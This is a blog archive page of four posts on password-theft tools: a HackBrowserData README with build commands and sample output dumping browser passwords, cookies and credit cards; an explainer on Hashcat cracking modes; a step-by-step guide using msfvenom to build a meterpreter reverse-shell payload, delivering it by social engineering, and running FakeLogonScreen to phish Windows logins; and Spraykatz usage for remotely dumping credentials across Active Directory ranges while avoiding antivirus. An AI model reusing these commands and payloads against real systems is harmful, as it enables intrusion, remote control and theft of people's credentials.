passwords Archives - Tech Chronicles

HackBrowserData – Decrypt passwords/cookies/history/bookmarks from the browser

Majordomo — Wed, 06 Apr 2022 11:19:02 +0000

Disclaimer: This tool is limited to security research only, and the user assumes all legal and related responsibilities arising from its use! The author assumes no legal responsibility!

https://github.com/moonD4rk/HackBrowserData

Supported Browser

Windows

Browser	Password	Cookie	Bookmark	History
Google Chrome
Google Chrome Beta
Chromium
Microsoft Edge
360 Speed
QQ
Brave
Opera
OperaGX
Vivaldi
Yandex
CocCoc
Firefox
Firefox Beta
Firefox Dev
Firefox ESR
Firefox Nightly
Internet Explorer

MacOS

Based on Apple’s security policy, some browsers require a current user password to decrypt.

Browser	Password	Cookie	Bookmark	History
Google Chrome
Google Chrome Beta
Chromium
Microsoft Edge
Brave
Opera
OperaGX
Vivaldi
Yandex
CocCoc
Firefox
Firefox Beta
Firefox Dev
Firefox ESR
Firefox Nightly
Safari

Linux

Browser	Password	Cookie	Bookmark	History
Google Chrome
Google Chrome Beta
Chromium
Microsoft Edge Dev
Brave
Opera
Vivaldi
Firefox
Firefox Beta
Firefox Dev
Firefox ESR
Firefox Nightly

Install

Installation of HackBrowserData is dead-simple, just download the release for your system and run the binary.

In some situations, this security tool will be treated as a virus by Windows Defender or other antivirus software and can not be executed. The code is all open source, you can modify and compile by yourself.

Building from source

support go 1.14+

git clone https://github.com/moonD4rk/HackBrowserData

cd HackBrowserData

go build

Cross compile

Need to install target OS’s gcc library, here’s an example of the use Mac building for Windows and Linus

Windows

brew install mingw-w64

CGO_ENABLED=1 GOOS=windows GOARCH=amd64 CC="x86_64-w64-mingw32-gcc" go build

Linux

brew install FiloSottile/musl-cross/musl-cross

CC=x86_64-linux-musl-gcc CXX=x86_64-linux-musl-g++ GOARCH=amd64 GOOS=linux CGO_ENABLED=1 go build -ldflags "-linkmode external -extldflags -static"

Run

You can double-click to run, or use the command line.

PS C:\test> .\hack-browser-data.exe -h
NAME:
   hack-browser-data - Export passwords/cookies/history/bookmarks from browser
USAGE:
   [hack-browser-data -b chrome -f json -dir results -cc]
   Get all data(password/cookie/history/bookmark) from chrome
VERSION:
   0.3.7

GLOBAL OPTIONS:
   --verbose, --vv                     verbose (default: false)
   --compress, --cc                    compress result to zip (default: false)
   --browser value, -b value           available browsers: all|opera|firefox|chrome|edge (default: "all")
   --results-dir value, --dir value    export dir (default: "results")
   --format value, -f value            format, csv|json|console (default: "csv")
   --profile-dir-path value, -p value  custom profile dir path, get with chrome://version
   --key-file-path value, -k value     custom key file path
   --help, -h                          show help (default: false)
   --version, -v                       print the version (default: false)

PS C:\test>  .\hack-browser-data.exe -b all -f json --dir results -cc
[x]:  Get 44 cookies, filename is results/microsoft_edge_cookie.json
[x]:  Get 54 history, filename is results/microsoft_edge_history.json
[x]:  Get 1 passwords, filename is results/microsoft_edge_password.json
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.json
[x]:  Get 6 bookmarks, filename is results/360speed_bookmark.json
[x]:  Get 19 cookies, filename is results/360speed_cookie.json
[x]:  Get 18 history, filename is results/360speed_history.json
[x]:  Get 1 passwords, filename is results/360speed_password.json
[x]:  Get 12 history, filename is results/qq_history.json
[x]:  Get 1 passwords, filename is results/qq_password.json
[x]:  Get 12 bookmarks, filename is results/qq_bookmark.json
[x]:  Get 14 cookies, filename is results/qq_cookie.json
[x]:  Get 28 bookmarks, filename is results/firefox_bookmark.json
[x]:  Get 10 cookies, filename is results/firefox_cookie.json
[x]:  Get 33 history, filename is results/firefox_history.json
[x]:  Get 1 passwords, filename is results/firefox_password.json
[x]:  Get 1 passwords, filename is results/chrome_password.json
[x]:  Get 4 bookmarks, filename is results/chrome_bookmark.json
[x]:  Get 6 cookies, filename is results/chrome_cookie.json
[x]:  Get 6 history, filename is results/chrome_history.json
[x]:  Compress success, zip filename is results/archive.zip

Run with custom browser profile path

PS C:\Users\User\Desktop> .\hack-browser-data.exe -b edge -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default' -k 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Local State'

[x]:  Get 29 history, filename is results/microsoft_edge_history.csv
[x]:  Get 0 passwords, filename is results/microsoft_edge_password.csv
[x]:  Get 1 credit cards, filename is results/microsoft_edge_credit.csv
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.csv
[x]:  Get 54 cookies, filename is results/microsoft_edge_cookie.csv


PS C:\Users\User\Desktop> .\hack-browser-data.exe -b edge -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'

[x]:  Get 1 credit cards, filename is results/microsoft_edge_credit.csv
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.csv
[x]:  Get 54 cookies, filename is results/microsoft_edge_cookie.csv
[x]:  Get 29 history, filename is results/microsoft_edge_history.csv
[x]:  Get 0 passwords, filename is results/microsoft_edge_password.csv

The post HackBrowserData – Decrypt passwords/cookies/history/bookmarks from the browser appeared first on Tech Chronicles.

Hashcat: How this Password Cracker Works

Majordomo — Fri, 13 Nov 2020 10:26:20 +0000

A must-have tool for penetration testers and to check password strength

Hashcat is a popular and effective password cracker widely used by both penetration testers and sysadmins as well as criminals and spies.

Cracking passwords is different from guessing a web login password, which typically only allows a small number of guesses before locking your account. Instead, someone who has gained access to a system with encrypted passwords (“hashes”) will often try to crack those hashes to recover those passwords.

Passwords are no longer stored in plaintext (or shouldn’t be, anyway). Instead, passwords are encrypted using a one-way function called a hash. Calculating a password like “Password1” into a hash is lightning quick. What if all you’ve got is the hash? A brute-force attack to reverse the hash function and recover the password could be computationally infeasible. Like, until the heat death of the universe infeasible.

Luckily, or unluckily depending on your point of view, none of us is likely to live that long, but there are many ways to reverse a hash to recover the original password without resorting to a probably fruitless brute-force attack.

ENTER hashcat.

It turns out humans are so predictable in their password choices that hashcat can often recover a password.

Hashcat uses

Cracking passwords has many legitimate uses, besides the obvious criminal and espionage ones. A sysadmin may wish to pre-emptively check the security of user passwords. If hashcat can crack them, so can an attacker.

Penetration testers on engagement will frequently find themselves cracking stolen password hashes to move laterally inside a network, or to escalate privileges to an admin user. Since penetration testers work to find security holes on purpose, under contract, so that their customer can improve their security, this is also a perfectly legitimate use case.

The real takeaway is that both illegal attackers and legit defenders use hashcat. The best way to prevent an attacker from using hashcat against you is to test your own defenses first to make sure any such attack can’t succeed.

How does hashcat work?

At its most basic level, hashcat guesses a password, hashes it, and then compares the resulting hash to the one it’s trying to crack. If the hashes match, we know the password. If not, keep guessing. There are numerous attacks short of a full brute-force attempt, including dictionary attacks, combinator attacks, mask attacks, and rule-based attacks. Hashcat can also harness the power of your GPU to brute force if you have the computing rig for it — and time to spare.

Hashcat examples

Hashcat dictionary attack
Since humans tend to use really bad passwords, a dictionary attack is the first and obvious place to start. The rockyou.txt word list is a popular option. Containing more than 14 million passwords sorted by frequency of use, it begins with common passwords such as “123456”, “12345”, “123456789”, “password”, “iloveyou”, “princess”, “1234567”, and “rockyou”, all the way to less common passwords such as “xCvBnM”, “ie168”, “abygurl69”, “a6_123”, and “*7¡Vamos!”.

Many other free wordlists exist on the internet, especially targeted at specific languages. Hashcat lets you specify the wordlist of your choice.

Hashcat combinator attack
Humans often create passwords that are two words mushed together. Hashcat exploits this using a combinator attack that takes two-word lists (also known as “dictionaries”) and creates a new word list of every word combined with every other word.

The hashcat documentation gives the following example of two dictionaries:

yellow
green
black
blue

and:

car
bike

Hashcat then smushes up every word with every other word, and then test the following passwords:

yellowcar
greencar
blackcar
bluecar
yellowbike
greenbike
blackbike
bluebike

Punctuation such as hyphens (-), exclamation points (!) and other special characters can also be added to create a final word list that has passwords like “yellow-car!” and “blue-bike!” and so forth.

Hashcat mask attack
Lots of users tend to use passwords in a certain format. One uppercase letter followed by six letters plus a digit on the end is common for older passwords — “Bananas1”, for example. Instead of trying to brute-force every possible password, you can use hashcat to search for all passwords in that format, which drastically reduces the number of possible guesses necessary — if, indeed, the password in question is in that format.

The hashcat documentation explains why a mask attack is often orders of magnitude faster than a brute-force attack:

In traditional brute-force attack we require a charset that contains all uppercase letters, all lowercase letters and all digits (a.k.a. “mixalpha-numeric”). The password length is 9, so we have to iterate through 62^9 (13.537.086.546.263.552) combinations. Let’s say we crack with a rate of 100M/s, this requires more than four years to complete.

In mask attack we know about humans and how they design passwords. The above password matches a simple but common pattern. A name and year appended to it. We can also configure the attack to try the uppercase letters only on the first position. It is very uncommon to see an uppercase letter only in the second or the third position. To make it short, with mask attack we can reduce the keyspace to 52*26*26*26*26*10*10*10*10 (237.627.520.000) combinations. With the same cracking rate of 100M/s, this requires just 40 minutes to complete.

Hashcat rule-based attack
If other, easier, options fail, and you’ve got a specific sense of how your target constructs a password, hashcat offers a programming language-like syntax for a rule-based attack, in which you can specify what kind of passwords to try.

“The rule-based attack is one of the most complicated of all the attack modes,” the hashcat website says. “The rule-based attack is like a programming language designed for password candidate generation. It has functions to modify, cut or extend words and has conditional operators to skip some, etc. That makes it the most flexible, accurate and efficient attack.”

The learning curve to get started with hashcat is very low but learning the hashcat rule syntax will spike that learning curve sharply.

Hashcat brute-force attack
If all else fails, throw a hail Mary and hope hashcat’s brute-force attack succeeds before our sun goes nova and engulfs the Earth. You never know, you might get lucky.

The post Hashcat: How this Password Cracker Works appeared first on Tech Chronicles.

How to Hack Windows 10 Passwords Using FakeLogonScreen in Kali Linux

Majordomo — Tue, 27 Oct 2020 19:57:56 +0000

This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic, so I decided to make this windows hacking tutorial.

I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakelogonScreen is a handy and stealthy tool that creates a fake Log on-screen on a target machine running Windows 10. This tool enforces the target user to enter the correct credentials and, after getting it, passes it to the backdoor attacker.

Arris Huijgen developed this useful tool, it takes advantage of the normal behavior of the Windows environment, displaying the login screen when it comes out of sleep mode, and asking to enter credentials. At that time, this tool looked for phishing Windows credentials from the target, and the strength of this tool came in when it only accepts the valid credentials.

Steps to Hack Windows 10 Password

Now let’s try this tool and perform the exploit. We need to deploy two virtual machines i.e. Kali Linux and Windows 10. In my virtual lab environment, the Kali (attacking machine) has an IP: 192.168.0.103, and the Windows (target machine) got 192.168.0.100.

Download the FakeLogonScreen in Kali Linux

First, we need to download the FakeLogonScreen executable in our attacking machine from the link:

https://github.com/bitsadmin/fakelogonscreen/releases

Now assume the target machine is connected to the same network as the attacking machine.

Creating the Malicious Payload to Hack Windows

We will create a malicious payload by using msfvenom tool according to the information acquired by the target system. We will set lhost to our Kali’s IP i.e. 192.168.0.103, and set lport as 4444. Since we are interested in exploiting a Windows system, we will generate a payload as an executable file to easily gets it executed on the target machine. Use command:

# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f exe >> payload.exe

Here the ‘payload.exe’ is the name of the generated payload. After that, we will run Python One-liner to create an HTTP server that will host this malicious payload at port 80 of the target machine.

#python -m SimpleHTTPServer 80

Download the Payload on Target Machine

All set now, the most crucial stage came when we have to get the target to download this malicious payload. In real-life scenarios, an attacker can use different social engineering techniques and let the target user to download this malicious file into his system.

For practical demonstration, we will access our Kali’s machine directory from the Windows machine and download the payload.

This will also be showing the current logs in our Kali machine.

Launch Metasploit to Exploit

Let’s get straight back to Kali and launch Metasploit-framework.

Use multi/handler module.

Set the windows/meterpreter/reverse_tcp payload.

Set lhost as our IP i.e. 192.168.0.103 and lport as 4444

After configuring it all, just run the exploit, go back to the Windows machine and run the executable, i.e., ‘payload.exe’. This will quickly get us a meterpreter session.

Upload the Executable

Now upload the FakeLogonScreen executable that we downloaded earlier. Make sure to give it the correct path of the exe file.

>upload /root/Downloads/FakeLogonScreen.exe

After that, get the shell access and run FakeLogonScreen.exe as showing below:

And BOOM!! At the target machine, all the running windows would get closed, and the logon screen would pop up, asking the credentials and appears it as a legitimate window. The user would not hesitate for a second to enter his credentials and get his work back.

To check the strength of this tool, we will be entering the wrong password.

And this will show the error “The password is incorrect, try again.” This is the strength of FakeLogonScreen tool that enforces a target to enter his correct password. The user has no choice other than that to enter his password.

Let’s enter the correct password, and you will get your standard window as nothing happened before.

This also showing the FakeLogonScreen works similar to a keylogger. The attacker would easily monitor all the logs and could grab the correct password of the target user.

Some Useful Information

This tool could also work effectively on multiple desktop systems. While running it on various desktops, all the affected screens turn black immediately after executing the exploit from the attacking machine. This works even if the target user has set a customized background.

The zip file of the exploit also includes another executable named “FakeLogonScreenToFile.exe” that works the same as the previous executable. Still, it has some extra features i.e., not only showing the password but also stores it in a file %LOCALAPPDATA%\Microsoft\user.db.

This tool can also be integrated with Cobalt Strike to work effectively.

The post How to Hack Windows 10 Passwords Using FakeLogonScreen in Kali Linux appeared first on Tech Chronicles.

Spraykatz – Retrieve Credentials On Windows and Active Directory

Majordomo — Thu, 26 Dec 2019 10:37:09 +0000

Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.
It simply tries to procdump machines and parse dumps remotely in order to avoid detections by antivirus softwares as much as possible.

Installation
This tool is written for python>=3. Do not use this on production environments!

Ubuntu
On a fresh updated Ubuntu.

apt update
apt install -y python3.6 python3-pip git nmap
git clone --recurse-submodules https://github.com/aas-n/spraykatz.git
cd spraykatz
pip3 install -r requirements.txt

Using Spraykatz
A quick start could be:

./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24

Mandatory arguments

Switches	Description
-u, –username	User to spray with. He must have admin rights on targeted systems in order to gain remote code execution.
-p, –password	User’s password or NTLM hash in the `LM:NT` format.
-t, –targets	IP addresses and/or IP address ranges. You can submit them via a file of targets (one target per line), or inline (separated by commas).

Optional arguments

Switches	Description
-d, –domain	User’s domain. If he is not member of a domain, simply use `-d .` instead.
-v, –verbosity	Verbosity mode {warning, info, debug}. Default == info.

Acknowlegments
Spraykatz uses slighlty modified parts of the following projects:

Download Spraykatz

The post Spraykatz – Retrieve Credentials On Windows and Active Directory appeared first on Tech Chronicles.